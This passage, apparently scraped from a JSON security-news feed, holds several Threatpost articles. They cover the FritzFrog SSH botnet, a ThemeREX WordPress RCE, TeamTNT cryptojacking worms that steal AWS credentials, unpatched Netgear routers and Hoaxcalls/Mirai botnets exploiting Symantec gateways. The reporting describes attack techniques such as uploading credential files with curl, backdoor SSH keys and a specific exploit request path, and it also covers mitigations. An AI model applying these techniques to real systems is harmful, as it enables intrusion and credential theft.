Microsoft can reduced reliance on passwords. [Please register here](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) and dare to ask, \u201c[Are passwords overrated?](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\u201d in this sponsored webinar. _**\n", "cvss3": {}, "published": "2020-04-01T21:07:22", "type": "threatpost", "title": "Wiper Malware Called \"Coronavirus\" Spreads Among Windows Victims", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-04-01T21:07:22", "id": "THREATPOST:F18124E38523CE6CF73ACDCF7DBF78BC", "href": "https://threatpost.com/wiper-malware-coronavirus-windows-victims/154368/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:21:31", "description": "A peer-to-peer (P2) botnet called FritzFrog has hopped onto the scene, and researchers said it has been actively breaching SSH servers since January.\n\nSSH servers are pieces of software found in routers and IoT devices, among other machines, and they use the secure shell protocol to accept connections from remote computers. SSH servers are common in enterprise and consumer environments alike.\n\nAccording to an analysis from Guardicore Labs, FritzFrog propagates as a worm, brute-forcing credentials at entities like governmental offices, educational institutions, medical centers, banks and telecom companies. FritzFrog has attempted to compromise tens of millions of machines so far, and has successfully breached more than 500 servers in total, Guardicore researcher Ophir Harpaz said. Victims include well-known universities in the U.S. and Europe, and a railway company; and the most-infected countries are China, South Korea and the U.S.\n\n[](<https://threatpost.com/newsletter-sign/>) \n\u201cFritzFrog executes a worm malware which is written in Golang, and is modular, multi-threaded and fileless, leaving no trace on the infected machine\u2019s disk,\u201d Harpaz explained, [in a posting](<https://www.guardicore.com/2020/08/fritzfrog-p2p-botnet-infects-ssh-servers/>) on Wednesday. Once the server is compromised, \u201cthe malware creates a backdoor in the form of an SSH public key, enabling the attackers ongoing access to victim machines.\u201d\n\nIt also can drop additional payloads, such as cryptominers.\n\n## **Swimming in a Unique Pond**\n\nFritzFrog is a P2P botnet, meaning that it has greater resiliency than other types of botnets because control is decentralized and spread among all nodes; as such, there\u2019s no single point-of-failure and no command-and-control server (C2).\n\n\u201cFritzFrog is completely proprietary; its P2P implementation was written from scratch, teaching us that the attackers are highly professional software developers,\u201d Harpaz said. She added, \u201cThe P2P protocol is completely proprietary, relying on no known P2P protocols such as \u03bcTP.\u201d\n\nAs far as the other technical details go, Guardicore analyzed the botnet by injecting its own nodes into the mix, giving researchers the ability to participate in the ongoing P2P traffic and see how it was built.\n\nThey discovered that almost everything about FritzFrog is unique when compared with past P2P botnets: Harpaz noted that it doesn\u2019t use IRC like IRCflu; it operates in-memory unlike another [cryptomining botnet, DDG](<https://threatpost.com/p2p-ddg-botnet-unstoppable/154650/>); and runs on Unix-based machines unlike others like the InterPlanetary Storm botnet.\n\nAdditionally, its fileless payload is unusual. Harpaz wrote that files are shared over the network to both infect new machines and run new malicious payloads on compromised ones \u2013 and that this is accomplished completely in-memory using blobs.\n\n\u201cWhen a node A wishes to receive a file from its peer, node B, it can query node B which blobs it owns using the command getblobstats,\u201d according to the researcher. \u201cThen, node A can get a specific blob by its hash, either by the P2P command getbin or over HTTP, with the URL http://:1234/. When node A has all the needed blobs \u2013 it assembles the file using a special module named Assemble and runs it.\u201d\n\nOne the malware is installed on a target by this method, it begins listening on port 1234, waiting for initial commands that will sync the victim with a database of network peers and brute-force targets. Once this initial syncing is finished, FritzFrog gets creative on the evasion-detection front when it comes to further communication from outside the botnet: \u201cInstead of sending commands directly over port 1234, the attacker connects to the victim over SSH and runs a netcat client on the victim\u2019s machine,\u201d according to the analysis. \u201cFrom this point on, any command sent over SSH will be used as netcat\u2019s input, thus transmitted to the malware.\u201d\n\nMeanwhile, the botnet constantly updates itself with databases of targets and breached machines as it worms through the internet.\n\n\u201cNodes in the FritzFrog network keep in close contact with each other,\u201d Harpaz noted. \u201cThey constantly ping each other to verify connectivity, exchange peers and targets and keep each other synced. The nodes participate in a clever vote-casting process, which appears to affect the distribution of brute-force targets across the network. Guardicore Labs observed that targets are evenly distributed, such that no two nodes in the network attempt to \u2018crack\u2019 the same target machine.\u201d\n\nFurther, it was built with an extensive dictionary of breached names and passwords for brute-forcing purposes, making it highly aggressive (\u201cBy comparison, DDG, a recently discovered P2P botnet, used only the username \u2018root,'\u201d said Harpaz).\n\nThe malware also spawns multiple threads to perform various tasks simultaneously. For instance, an IP address in the target queue will be fed to a Cracker module, which in turn will scan the machine attached to the IP address and try to brute-force it; a machine which was successfully breached is queued for malware infection by the DeployMgmt module; and a machine which was successfully infected will be added to the P2P network by the Owned module.\n\nIn the event of a reboot of the compromised system, the malware leaves a backdoor behind, whose login credentials are saved by the network peers.\n\n\u201cThe malware adds a public SSH-RSA key to the authorized_keys file,\u201d according to the research. \u201cThis simple backdoor allows the attackers \u2013 who own the secret private key \u2013 for passwordless authentication, in case the original password was modified.\u201d\n\nThe malware also monitors the file system state on infected machines, periodically checking for available RAM, uptime, SSH logins and CPU-usage statistics. Other nodes take this information and uses it to determine whether to run a cryptominer or not.\n\nIf it decides to run a cryptominer, the malware runs a separate process called \u201clibexec\u201d to mine the Monero cryptocurrency with an XMRig spinoff. Though this secondary infection is what the botnet has so far been used for, its architecture means that it could also install any other type of malware on infected nodes, should its authors decide to do so.\n\nIn all, FritzFrog is highly advanced, Harpaz said, but there\u2019s a simple way to ward off a compromise: \u201cWeak passwords are the immediate enabler of FritzFrog\u2019s attacks,\u201d she said. \u201cWe recommend choosing strong passwords and using public key authentication, which is much safer.\u201d\n\nAdmins should also remove FritzFrog\u2019s public key from the authorized_keys file, preventing the attackers from accessing the machine, she said. And, \u201crouters and IoT devices often expose SSH and are thus vulnerable to FritzFrog; consider changing their SSH port or completely disabling SSH access to them if the service is not in use.\u201d\n\n_It\u2019s the age of remote working, and businesses are facing new and bigger cyber-risks \u2013 whether it\u2019s collaboration platforms in the crosshairs, evolving insider threats or issues with locking down a much broader footprint. Find out how to address these new cybersecurity realities with our complimentary _[_Threatpost eBook_](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>)**_, 2020 in Security: Four Stories from the New Threat Landscape_**_, presented in conjunction with Forcepoint. We redefine \u201csecure\u201d in a work-from-home world and offer compelling real-world best practices. _[_Click here to download our eBook now_](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>)_._\n", "cvss3": {}, "published": "2020-08-19T20:46:31", "type": "threatpost", "title": "FritzFrog Botnet Attacks Millions of SSH Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-08-19T20:46:31", "id": "THREATPOST:639CADC540E81321048EB418C2EC7586", "href": "https://threatpost.com/fritzfrog-botnet-millions-ssh-servers/158489/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:27:42", "description": "A critical vulnerability in a WordPress plugin known as \u201cThemeREX Addons\u201d could open the door for remote code execution in tens of thousands of websites. According to Wordfence, the bug has been actively exploited in the wild as a zero-day.\n\nThe plugin, which is installed on approximately 44,000 sites, is used to apply various \u201cskins\u201d that govern the look and feel of web destinations, including theme-enhancing features and widgets.\n\nTo provide compatibility with WordPress\u2019 Gutenberg plugin, the ThemeREX Addons plugin uses an API, according to Wordfence researcher Chloe Chamberland, writing in [a blog posting](<https://www.wordfence.com/blog/2020/03/zero-day-vulnerability-in-themerex-addons-now-patched/>) on Monday. When the API interacts with Gutenberg, the touchpoints of that communication are known as endpoints. ThemeREX uses the \u201c~/includes/plugin.rest-api.php\u201d file to register an endpoint (\u201c/trx_addons/v2/get/sc_layout\u201d), which in turn calls the \u201ctrx_addons_rest_get_sc_layout\u201d function.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThis introduces an access-control problem, the researcher noted. In unpatched versions of ThemeREX, \u201cthere were no capability checks on this endpoint that would block users that were not administrators or currently signed in, so any user had the ability to call the endpoint regardless of capability,\u201d she explained. \u201cIn addition, there was no nonce check to verify the authenticity of the source.\u201d\n\nFurther down in the code, there\u2019s also a functionality used to get parameters from widgets that work with the Gutenberg plugin.\n\n\u201cThis is where the core of the remote code execution vulnerability was present,\u201d Chamberland wrote. \u201cThere were no restrictions on the PHP functions that could be used or the parameters that were provided as input. Instead, we see a simple if (function_exists($sc)) allowing for any PHP function to be called and executed.\u201d\n\nThe upshot of this is that adversaries can use various WordPress functions \u2013 for instance, in attacks in the wild, the \u201cwp_insert_user\u201d function was used to create administrative user accounts and take over sites, according to the research.\n\nThemeREX has now addressed the issue by completely removing the affected ~/plugin.rest-api.php file from the plugin \u2013 users should update to the latest version to stay protected.\n\nWordPress plugins continue to be a rich avenue of attack for cybercriminals. Last month, popular WordPress plugin Duplicator, which has more than 1 million active installations, [was discovered to have](<https://www.wordfence.com/blog/2020/03/zero-day-vulnerability-in-themerex-addons-now-patched/>) an unauthenticated arbitrary file download vulnerability that was being attacked.\n\nAnd, earlier in February a critical flaw in a popular WordPress plugin that helps make websites compliant with the General Data Protection Regulation (GDPR) [was disclosed](<https://threatpost.com/critical-wordpress-plugin-bug-afflicts-700k-sites/152871/>); it could enable attackers to modify content or inject malicious JavaScript code into victim websites. It affected 700,000 sites.\n\n**_Interested in security for the Internet of Things and how 5G will change things? Join our free Threatpost webinar, [\u201c5G, the Olympics and Next-Gen Security Challenges,\u201d](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>) as our panel discusses what use cases to expect in 2020 (the Olympics will be a first test), why 5G security risks are different, the role of AI in defense and how enterprises can manage their risk. [Register here](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>)._**\n", "cvss3": {}, "published": "2020-03-10T20:30:36", "type": "threatpost", "title": "Popular ThemeREX WordPress Plugin Opens Websites to RCE", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-03-10T20:30:36", "id": "THREATPOST:CEFF4DB144B2E463CD3FB46A8A93EEF8", "href": "https://threatpost.com/themerex-wordpress-plugin-remote-code-execution/153592/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:09:04", "description": "Researchers have discovered the latest cryptojacking malware gambit from TeamTNT, called Black-T. The variant builds on the group\u2019s typical approach, with a few new \u2014 and sophisticated \u2014 extras.\n\nTeamTNT is known for its targeting of Amazon Web Services (AWS) credentials, to break into the cloud and use it to mine for the [Monero](<https://threatpost.com/monero-cybercrime-mining-malware/141116/>) cryptocurrency. But according to researchers with Palo Alto Network\u2019s Unit 42, with [Black-T](<https://unit42.paloaltonetworks.com/black-t-cryptojacking-variant/>), the group has added in additional capabilities to its tactics, techniques and procedures (TTPs). These include the addition of sophisticated network scanners; the targeting of competitor XMR mining tools on the network; and the use of password scrapers.\n\nWhat TeamTNT plans to do with the saved passwords and additional capabilities is still unclear, but the development signals that the group doesn\u2019t plan to slow down anytime soon.\n\nIn August, [TeamTNT was identified by researchers](<https://threatpost.com/aws-cryptojacking-worm-cloud/158427/>) as the first cryptojacking group to specifically target AWS. With increasingly sophisticated TTPs, the cybercriminal gang appears to be gaining steady momentum. Just last month, TeamTNT was discovered to have been leveraging a common open-source cloud monitoring tool called [Weave Scope, to infiltrate the cloud](<https://threatpost.com/teamtnt-remote-takeover-cloud-instances/159075/>) and execute commands without breaching the server.\n\nBlack-T represents a notable jump forward in the operation\u2019s sophistication, researchers said.\n\nOnce deployed, the first order of business for Black-T is to disable any other malware competing for processing power, including Kinsing, Kswapd0, ntpd miner, redis-backup miner, auditd miner, Migration miner, the Crux worm and Crux worm miner. Ironically, the fact that TeamTNT identified these competitors in their malware gives security professionals a critical heads-up to be on the lookout for potential threats from these groups, Unit 42 said.\n\nThis kind of cyberjacking turf warfare isn\u2019t new, but it appears to be accelerating.\n\n\u201cThe battle for cloud resources will continue well into the future,\u201d Nathaniel Quist, senior threat researcher for Unit 42 said. \u201cIn the past, attacker groups like [Rocke](<https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/>) and [Pacha](<https://www.paloaltonetworks.com/resources/research/digital-executive-summary-unit-42-cloud-threat-report-spring-2020>) would battle for resources. TeamTNT is battling with Kinsing malware and Crux worm today. I believe that this battle for resources will increase and attacker groups will look for other opportunities to use cloud resources. We can see this now with TeamTNT collecting passwords and AWS credentials in an attempt to expand and maintain a cloud presence.\u201d\n\nAfter it eliminates the competition, Black-T installs masscan, libpcap to listen to various resources on the network, including pnscan, zgrab, Docker and jq (the latter is a flexible command-line JSON processor, according to Unit 42).\n\n\u201cTeamTNT is investing more resources into scanning operations, likely with the intent to identify and compromise more cloud systems,\u201d Quist added. \u201cZmap is a known open-source scanning solution and with the creation of zgrab, a GoLang tool written for zmap, it is attempting to capitalize on the added benefits of the Go programming language, such as speed and performance increases. It is likely that TeamTNT actors are attempting to refine their scanning capabilities to make them faster, more accurate and less resource-intensive.\u201d\n\nNext, Black-T fetches various downloads: Beta to create a new directory; the mimipy and mimipenquin password scraping tools; and the XMR mining software called bd.\n\n\u201cThe inclusion of memory password-scraping tools should be considered an evolution of tactics,\u201d Quist said. \u201cTeamTNT has already integrated the collection and exfiltration of AWS credentials from compromised cloud systems, which provides post-exploitation capabilities. By adding memory password-scraping capabilities, TeamTNT actors are increasing their chances in gaining persistence within cloud environments.\u201d\n\nThe use of [worms](<https://threatpost.com/worm-golang-malware-windows-payloads/156924/>) like masscan or pnscan by TeamTNT isn\u2019t new, but Unit 42 noticed Black-T adds a new scanning port. Researchers wonder whether this signals the group has figured out how to target Android devices as well.\n\nAs remote work and cost savings continue to drive computing to the cloud, more groups like TeamTNT are sure to emerge ready to take advantage, according to Quist. Admins should take steps to ensure that [Docker](<https://threatpost.com/doki-backdoor-docker-servers-cloud/157871/>) and daemon APIs, as well as any other sensitive network services, aren\u2019t exposed, so that the cloud can be protected from the next evolution of cloud cryptojackers, he added.\n\n**[On October 14 at 2 PM ET](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>) Get the latest information on the rising threats to retail e-commerce security and how to stop them. [Register today](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>) for this FREE Threatpost webinar, \u201c[Retail Security: Magecart and the Rise of e-Commerce Threats.](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\u201d Magecart and other threat actors are riding the rising wave of online retail usage and racking up big numbers of consumer victims. Find out how websites can avoid becoming the next compromise as we go into the holiday season. Join us Wednesday, Oct. 14, 2-3 PM ET for this [LIVE ](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)webinar. **\n", "cvss3": {}, "published": "2020-10-05T19:47:05", "type": "threatpost", "title": "Black-T Malware Emerges From Cryptojacker Group TeamTNT", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-10-05T19:47:05", "id": "THREATPOST:D4F89B42660582EFECA648A891470AD4", "href": "https://threatpost.com/blackt-cryptojacker-teamtnt/159853/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:21:12", "description": "A cryptomining worm from the group known as TeamTNT is spreading through the Amazon Web Services (AWS) cloud and collecting credentials. Once the logins are harvested, the malware logs in and deploys the XMRig mining tool to mine Monero cryptocurrency.\n\nAccording to researchers at Cado Security, the worm also deploys a number of openly available malware and offensive security tools, including \u201cpunk.py,\u201d a SSH post-exploitation tool; a log cleaning tool; the Diamorphine rootkit; and the Tsunami IRC backdoor.\n\nIt is, they said, the first threat observed in the wild that specifically targets AWS for cryptojacking purposes. However, it also carries out more familiar fare.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe worm also steals local credentials, and scans the internet for misconfigured Docker platforms,\u201d according to a [Monday posting](<https://www.cadosecurity.com/2020/08/17/teamtnt-the-first-crypto-mining-worm-to-steal-aws-credentials/>). \u201cWe have seen the attackers\u2026compromise a number of Docker and Kubernetes systems.\u201d\n\nAs more businesses embrace cloud and container environments, it has opened up a new attack surface for cybercriminals via misconfiguration. That said, cryptomining threats taking aim at Docker and Kubernetes aren\u2019t new. Attackers continue to scan for [publicly accessible, open Docker/Kubernetes servers](<https://threatpost.com/docker-registries-malware-data-theft/152734/>) in an automated fashion, and then exploit them in order to set up their own containers and execute malware on the victim\u2019s infrastructure.\n\nUsually that malware is a cryptominer of some kind, [as seen in April](<https://threatpost.com/self-propagating-malware-docker-ports/154453/>) in a Bitcoin-mining campaign using the Kinsing malware. Sometimes the threat is more evolved, as seen in July, when a fresh [Linux backdoor called Doki](<https://threatpost.com/icedid-trojan-rebooted-evasive-tactics/158425/>) was seen infesting Docker servers to sett the scene for any number of malware-based attacks, from denial-of-service/sabotage to information exfiltration to ransomware.\n\nHowever, the focus on AWS in this latest set of campaigns \u2013 which [were also flagged](<https://twitter.com/malwrhunterteam/status/1256664761997148161>) by MalwareHunterTeam \u2013 is unique, Cado researchers said.\n\n## **Attacking AWS**\n\nThe attack starts with targeting the way that AWS stores credentials in an unencrypted file at ~/.aws/credentials, and additional configuration details in a file at ~/.aws/config.\n\n\u201cThe code to steal AWS credentials is relatively straightforward \u2013 on execution it uploads the default AWS credentials and config files to the attackers\u2019 server, sayhi.bplace[.]net,\u201d researchers explained. \u201cCurl is used to send the AWS credentials to TeamTNT\u2019s server.\u201d\n\nInterestingly, though the script is written to be a worm, the automated portion of the attack didn\u2019t seem to be in full operation during the security firm\u2019s analysis.\n\n\u201cWe sent credentials created by CanaryTokens.org to TeamTNT, however have not seen them in use yet,\u201d according to the post. \u201cThis indicates that TeamTNT either manually assess and use the credentials, or any automation they may have created isn\u2019t currently functioning.\u201d\n\nThe script that anchors TeamTNT\u2019s worm is repurposed code from the aforementioned Kinsing malware, researchers said, which was originally used to scan for misconfigured Docker APIs, then spin up Docker images and install itself. They added that copying code from other tools is common in this area of cybercrime.\n\n\u201cIn turn, it is likely we will see other worms start to copy the ability to steal AWS credentials files too,\u201d they said. \u201cWhilst these attacks aren\u2019t particularly sophisticated, the numerous groups out there deploying cryptojacking worms are successful at infecting large amounts of business systems.\u201d\n\n## **TeamTNT \u2013 It\u2019s Dynamite**\n\nAs far as attribution, TeamTNT announces itself in numerous references within the worm\u2019s code, according to researchers, plus the group uses a domain called teamtnt[.]red. That domain hosts malware, and the homepage is entitled \u201cTeamTNT RedTeamPentesting.\u201d\n\nTeamTNT has been prolific, and was spotted originally earlier in the year. In April, Trend Micro [observed](<https://www.trendmicro.com/vinfo/hk-en/security/news/virtualization-and-cloud/coinminer-ddos-bot-attack-docker-daemon-ports>) the group attacking Docker containers.\n\nAn examination by Cado of one of the mining pools yielding information about the systems that the AWS-capable worm has compromised showed that for the one pool, there were 119 compromised systems, across AWS, Kubernetes clusters and Jenkins build servers.\n\n\u201cSo far we have seen two different Monero wallets associated with these latest attacks, which have earned TeamTNT about three XMR,\u201d researchers explained. \u201cThat equates to only about $300, however this is only one of their many campaigns.\u201d\n\nCado researchers suggested that to thwart such attacks, businesses should identify which systems are storing AWS credential files and delete them if they aren\u2019t needed. Also, review network traffic for any connections to mining pools or those sending the AWS credentials file over HTTP; and, use firewall rules to limit any access to Docker APIs.\n\n_It\u2019s the age of remote working, and businesses are facing new and bigger cyber-risks \u2013 whether it\u2019s collaboration platforms in the crosshairs, evolving insider threats or issues with locking down a much broader footprint. Find out how to address these new cybersecurity realities with our complimentary _[_Threatpost eBook_](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>)**_, 2020 in Security: Four Stories from the New Threat Landscape_**_, presented in conjunction with Forcepoint. We redefine \u201csecure\u201d in a work-from-home world and offer compelling real-world best practices. _[_Click here to download our eBook now_](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>)_._\n", "cvss3": {}, "published": "2020-08-18T14:14:12", "type": "threatpost", "title": "AWS Cryptojacking Worm Spreads Through the Cloud", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-08-18T14:14:12", "id": "THREATPOST:0A238D67F7286BA41103801846210F7A", "href": "https://threatpost.com/aws-cryptojacking-worm-cloud/158427/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:21:48", "description": "UPDATE\n\nNetgear will not patch 45 router models that are vulnerable to a high-severity remote code execution flaw, the router company revealed last week. However, the company says that routers that won\u2019t receive updates are outdated or have reached EOL (End of Life).\n\nThe [remote code execution vulnerability](<https://www.zerodayinitiative.com/advisories/ZDI-20-712/>) in question, [which was disclosed June 15](<https://threatpost.com/netgear-zero-day-takeover-routers/156744/>), allows network-adjacent attackers to bypass authentication on vulnerable Netgear routers \u2013 sans authentication. The high-severity flaw affects 79 Netgear Wi-Fi routers and home gateway models \u2013 but Netgear says that 45 of those router models are outside of its \u201csecurity support period.\u201d\n\n\u201cNetgear has provided firmware updates with fixes for all supported products previously disclosed by ZDI and Grimm,\u201d Netgear said in a [press statement](<https://www.tomsguide.com/news/netgear-routers-no-fixes>). \u201cThe remaining products included in the published list are outside of our support window. In this specific instance, the parameters were based on the last sale date of the product into the channel, which was set at three years or longer.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nA full list of the router models that won\u2019t be patched \u2013 as well as those that have fixes being rolled out \u2013 [is available on Netgear\u2019s website](<https://kb.netgear.com/000061982/Security-Advisory-for-Multiple-Vulnerabilities-on-Some-Routers-Mobile-Routers-Modems-Gateways-and-Extenders>).\n\n\u201cWhen we look at support windows, some of our products last five or six years, while others last only a few years,\u201d David Henry, senior vice president of Connected Home products at Netgear, told Threatpost. \u201cWhen we launch a product, as it gets old it goes into End of Life (EOL) and we stop building it and wind down [sales into the channel].\u201d\n\nFor instance, one such Modem Router that won\u2019t receive an update, the AC1450 series, is as old as 2009. Other router models, while newer, have reached EOL: The [R6200 and R6200v2](<https://kb.netgear.com/23748/R6200v2-FAQs>) wireless routers reached EOL in 2013 and 2016, respectively; while the Nighthawk [R7300DST](<https://www.amazon.com/NETGEAR-Nighthawk-Wireless-AC-Gigabit-Adapter/dp/B01HB56E5G>) wireless router reached EOL in the first half of 2017, said Henry.\n\nRegardless, Henry stressed that customers using both newer and older router models stay updated on security updates, as well as adopting best security practices, including turning off features like remote access or changing admin passwords (which he said is enforced by Netgear).\n\n\u201cI think it is really important that customers are paying attention to the updates we send out quarterly on our products,\u201d said Henry.\n\n## **The Flaw **\n\nAccording to the [Zero Day Initiative](<https://www.zerodayinitiative.com/advisories/ZDI-20-712/>) (ZDI), which first disclosed the issue, the flaw exists within the httpd service, which listens on TCP port 80 by default. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length, stack-based buffer. An attacker can leverage this flaw to execute code in the context of root, according to ZDI.\n\n\u201cGiven the nature of the vulnerability, the only salient mitigation strategy is to restrict interaction with the service to trusted machines,\u201d according to ZDI. \u201cOnly the clients and servers that have a legitimate procedural relationship with the service should be permitted to communicate with it. This could be accomplished in a number of ways, most notably with firewall rules/whitelisting.\u201d\n\nThe flaw was reported to Netgear on Jan. 8, 2020, and on June 15, 2020 the security advisory for the flaw was publicly released without a patch available. Additionally, a PoC exploit was published by the [GRIMM blog on June 15.](<https://blog.grimm-co.com/2020/06/soho-device-exploitation.html>)\n\nNetgear has rolled out patches for 34 of the vulnerable models since the flaw was disclosed. That includes releasing \u201csecurity hotfixes\u201d for the models, which are fixes that are applied on top of existing, fully tested firmware.\n\n\u201cReleasing hotfixes allows Netgear to quickly update existing products and streamline the firmware verification process without going through full regression testing,\u201d according to Netgear. \u201cThese hotfixes are targeted at specific security issues and should have minimal effect on other areas of the product\u2019s code.\u201d\n\n## **Patch Timeline Backlash **\n\nSeveral security experts are criticizing Netgear for its patching policies and procedures. Brian Gorenc, senior director of vulnerability research and head of Trend Micro\u2019s Zero Day Initiative (ZDI) program, told Threatpost that the vulnerabilities disclosed represent some of the most severe bug categories available.\n\n\u201cUnfortunately, there are too many examples of vendors abandoning devices that are still in wide use \u2013 sometimes even when they are still available to purchase,\u201d Gorenc told Threatpost. \u201cMaybe we need to recommend manufacturers who support their products for longer \u2013 especially in our digitally connected lives. If we reward good communications and long-term support from vendors, maybe this abandonment problem will get better.\u201d\n\nZach Varnell, senior AppSec consultant at nVisium, said that the disclosure on this vulnerability \u201cappears to be more than generous since the researcher followed responsible disclosure practices and even gave an extension when asked for it.\u201d\n\n\u201cIt\u2019s unfortunate for anyone who owns one of those routers but that\u2019s the reality of product lifecycles,\u201d said Varnell. \u201cBasically everything \u2013 including software, toys, cars, electronics, appliances \u2013 will reach an age where their manufacturer will no longer support them. The duration of support varies widely and software tends to be on the shorter side since new development is done much more rapidly than hardware.\u201d\n\n\u201cConsumers should always ensure their devices are still supported by manufacturers and check the available support before purchasing a new device,\u201d said Gorenc.\n\nVulnerabilities in routers have been discovered several times over the past year. In March, [Netgear warned users](<https://threatpost.com/critical-netgear-bug-impacts-nighthawk-router/153445/>) of a critical remote code execution bug that could allow an unauthenticated attacker to take control of its Wireless AC Router Nighthawk (R7800) hardware running firmware versions prior to 1.0.2.68. In July, a pair of [flaws in ASUS routers](<https://threatpost.com/asus-home-router-bugs-snooping-attacks/157682/>) for the home were uncovered that could allow an attacker to compromise the devices \u2013 and eavesdrop on all of the traffic and data that flows through them.\n\n_This article was updated on Aug. 4 at 11:30 am ET with further comments from Netgear. _\n\n_**Complimentary Threatpost Webinar**__: Want to learn more about Confidential Computing and how it can supercharge your cloud security? This webinar \u201c**[Cloud Security Audit: A Confidential Computing Roundtable](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**\u201d brings top cloud-security experts from Microsoft and __Fortanix together to explore how **Confidential Computing** is a game changer for securing dynamic cloud data and preventing IP exposure. Join us **[Wednesday Aug. 12 at 2pm ET](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>) **for this** FREE **live webinar with Dr. David Thaler, software architect, Microsoft and Dr Richard Searle, security architect, Fortanix \u2013 both with the Confidential Computing Consortium. **[Register Now](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**._\n\nWrite a comment\n\n**Share this article:**\n\n * [Vulnerabilities](<https://threatpost.com/category/vulnerabilities/>)\n * [Web Security](<https://threatpost.com/category/web-security/>)\n", "cvss3": {}, "published": "2020-08-03T19:03:46", "type": "threatpost", "title": "Netgear Won't Patch 45 Router Models Vulnerable to Serious Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-08-03T19:03:46", "id": "THREATPOST:9AADE8E4BD604BE3415C6DD56ECA3640", "href": "https://threatpost.com/netgear-wont-patch-45-router-models-vulnerable-to-serious-flaw/157977/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:25:06", "description": "Cyberattackers are targeting a post-authentication remote code-execution vulnerability in Symantec Secure Web Gateways as part of new Mirai and Hoaxcalls botnet attacks.\n\nHoaxcalls first emerged in late March, as a variant of the Gafgyt/Bashlite family; it\u2019s named after the domain used to host its malware, Hoaxcalls.pw. Two new Hoaxcalls samples [showed up on the scene](<https://threatpost.com/fast-moving-ddos-botnet-unpatched-zyxel-rce-bug/155059/>) in April, incorporating new commands from its command-and-control (C2) server. These included the ability to proxy traffic, download updates, maintain persistence across device restarts, prevent reboots and launch a larger number of distributed denial-of-service (DDoS) attacks.\n\nIt also incorporated a new exploit for infiltrating devices \u2013 an [unpatched vulnerability](<https://threatpost.com/flaws-zyxels-network-management-software/153554/>) impacting the ZyXEL Cloud CNM SecuManager that was disclosed in March. Now, researchers at Palo Alto Networks\u2019 Unit 42 division have observed that same version of the botnet exploiting a second unpatched bug, this time in Symantec Secure Web Gateway version 5.0.2.8, which is a product that became end-of-life (EOL) in 2015 and end-of-support-life (EOSL) in 2019.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe Symantec bug was [disclosed in March](<https://code610.blogspot.com/2020/03/postauth-rce-in-symantec-web-gateway.html>). Since it affects older versions of the gateway, it will remain unpatched.\n\n\u201cOn April 24, I observed samples of the same botnet incorporating an exploit targeting the EOL\u2019d Symantec Secure Web Gateway v5.0.2.8, with an HTTP request in the format: POST /spywall/timeConfig.php HTTP/1.1,\u201d said Unit 42 researcher Ruchna Nigam, in a [Thursday post](<https://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/>). \u201cSome samples reach out to a URL for a public file upload service (plexle[.]us) where the post-exploitation payload is hosted. The URL contacted for the update serves a shell script that downloads and executes binaries from attacker-controlled URLs.\u201d\n\nMeanwhile, Nigam also saw a [Mirai variant](<https://threatpost.com/new-mirai-variant-mukashi-targets-zyxel-nas-devices/153982/>) campaign in May spreading using that same vulnerability; oddly, the malware itself lacks any DDoS capabilities, according to the researcher. As such, the binary seems to be a first-stage loader.\n\n\u201cSamples of this campaign surfaced early May, built on the Mirai source code, and are packed with a modified version of UPX by using a different 4-byte key with the UPX algorithm,\u201d according to Nigam. \u201cAnother deviation from the Mirai source-code is the use of all of ten 8-byte keys that are cumulatively used for a byte-wise string encryption scheme.\u201d\n\nThe vulnerability as mentioned is a post-authentication bug, meaning that the exploit is only effective for authenticated sessions. It\u2019s also no longer present in the latest version of the Symantec Web Gateway, version 5.2.8, so updated devices are protected.\n\nResearchers at Radware previously noted that Hoaxcalls operators seem very quick to weaponize newly discovered bugs, like the ZyXel vulnerability. Unit 42\u2019s 